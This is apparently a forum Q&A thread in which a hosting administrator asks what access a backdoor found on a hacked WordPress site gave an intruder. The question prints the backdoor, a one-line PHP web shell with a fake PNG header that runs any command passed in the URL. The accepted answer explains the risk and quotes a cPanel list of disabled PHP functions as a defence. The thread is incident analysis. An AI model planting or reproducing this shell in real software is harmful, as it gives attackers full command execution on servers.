# Backdoor exploit - could they have downloaded files from server?

Tags: cpanel, hacked-site

Due to a customer running old Wordpress plugins, a php file with the following code was added to their website:

```
‰PNG
<?php $str = $_GET['cmd']; system($str); ?>
```

The above file was detected by Wordfence as "Backdoor:PNG/ImageMagic.7484 Executable code masquerading as an image."

This (or another exploit) appears to have give the intruder the ability to at least upload or create text files containing the words "Hacked by ..." to various places on the server.

Using this exploit, what kind of access would be allowed onto the server besides the ability to upload files? Could they have also downloaded files from anywhere on the server?

We are running a cPanel environment on Apache, MySQL and PHP.

Comment: What's the name of the file on the system (is it `.php` or `.png`)? Where is file?

Comment: @MrWhite it was a php file and it was in a sub directory of a Wordpress plugin.

Comment: @authentictech which plugin?  Might help others of us avoid this on our servers :P

Comment: @Steve I don't think the file being in a particular plugin directory means it was that plugin that was vulnerable. Once they gained access they could have put the file anywhere. All the plugins and Wordpress were old versions so it could have been any of them reponsible. The problem was initially brought to our attention by ClamAV concerning a malicious file found on another customer's website on the same server so I'm not sure which came first. All one can do is encourage (or force, if you can) all customers to keep all software up to date.

Answer (score 6, accepted):

> ```
> <?php $str = $_GET['cmd']; system($str); ?>
> ```

This potentially allows the attacker to pretty much do/execute *anything* on your system by passing an arbitrary command in the URL query string! So, yes, it could potentially allow files to be downloaded, eg. using `wget`.

However, whether this would work as intended for the attacker would depend on how "secure" your system is:

- Permissions of the PHP/Apache user could (should) be limited.
- The necessary system commands might not be available.
- The PHP `system()` function could be disabled in the server config, so would block this particular attack. In fact, cPanel has this feature as part of the PHP config options and will by "default" (I assume) block the following PHP functions:

> ```
> system
> system_exec
> symlink
> shell
> shell_exec
> exec
> passthru
> escapeshellarg
> escapeshellcmd
> proc_close
> proc_open
> ini_alter
> dl
> show_source
> proc_get_status
> proc_nice
> proc_terminate
> highlight_file
> define_syslog_variables
> posix_uname
> posix_getpwuid
> apache_child_terminate
> posix_kill
> posix_mkfifo
> posix_setpgid
> posix_setsid
> posix_setuid
> ini_restore
> inject_code
> define_syslog_variables
> apache_setenv
> eval
> phpAds_XmlRpc
> phpAds_remoteInfo
> phpAds_xmlrpcEncode
> phpAds_xmlrpcDecode
> xmlrpc_entity_decode
> ```